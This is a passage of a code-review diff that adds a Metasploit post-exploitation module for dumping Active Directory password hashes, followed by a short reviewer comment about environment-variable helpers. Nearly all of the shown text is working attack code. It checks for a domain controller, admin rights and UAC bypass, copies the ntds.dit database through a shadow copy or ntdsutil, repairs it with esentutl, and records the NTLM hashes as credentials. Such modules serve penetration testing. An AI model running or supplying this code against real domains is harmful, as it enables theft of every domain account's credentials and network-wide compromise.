modules/post/windows/gather/credentials/domain_hashdump.rb

```diff
@@ -0,0 +1,159 @@
+            hash_string << ":#{nt_hash}"
+            report_hash(hash_string.downcase,ad_account.name, realm)
+          end
+        end
+      end
+    end
+  end
+
+  def copy_database_file
+    database_file_path = nil
+    if start_vss
+      case  sysinfo["OS"]
+        when /2003| \.NET/
+          database_file_path = vss_method
+        when /2008|2012/
+          database_file_path = ntdsutil_method
+        else
+          print_error "This version of Windows is unsupported"
+      end
+    end
+    database_file_path
+  end
+
+  def domain_name
+    result = cmd_exec('cmd.exe', '/c systeminfo | findstr /B /C:"Domain"')
+    result.gsub!(/Domain:\s+/,'')
+  end
+
+  def is_domain_controller?
+    status = false
+    if session.fs.file.exists?('%SystemDrive%\Windows\ntds\ntds.dit')
+      status = true
+    end
+    status
+  end
+
+  def ntdsutil_method
+    tmp_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
+    result = cmd_exec("ntdsutil.exe", command_arguments)
+    if result.include? "IFM media created successfully"
+      file_path = "#{tmp_path}\\Active Directory\\ntds.dit"
+      print_status "NTDS database copied to #{file_path}"
+    else
+      print_error "There was an error copying the ntds.dit file!"
+      vprint_error result
+      file_path = nil
+    end
+    file_path
+  end
+
+
+  def preconditions_met?
+    status = true
+    unless is_domain_controller?
+      print_error "This does not appear to be an AD Domain Controller"
+      status = false
+    end
+    unless is_admin?
+      print_error "This module requires Admin privs to run"
+      status = false
+    end
+    if is_uac_enabled?
+      print_error "This module requires UAC to be bypassed first"
+      status = false
+    end
+    unless session_compat?
+      status = false
+    end
+    return status
+  end
+
+  def repair_ntds(path='')
+    arguments = "/p /o \"#{path}\""
+    cmd_exec("esentutl", arguments)
+  end
+
+  def report_hash(ntlm_hash, username, realm)
+    cred_details = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: self.refname,
+      private_type: :ntlm_hash,
+      private_data: ntlm_hash,
+      username: username,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: realm,
+      workspace_id: myworkspace_id
+    }
+    create_credential(cred_details)
+  end
+
+  def session_compat?
+    if sysinfo['Architecture'] =~ /x64/ && session.platform =~ /x86/
+      print_error "You are running 32-bit Meterpreter on a 64 bit system"
+      print_error "Try migrating to a 64-bit process and try again"
+      false
+    else
+      true
+    end
+  end
+
+  def vss_method
+    id = create_shadowcopy("#{expand_path("%SystemDrive%")}\\")
```

Comment:
Not sure why we moved to get_env but we pretty much normalized all post modules to get environment variables rather than expand_path in: https://github.com/rapid7/metasploit-framework/pull/2782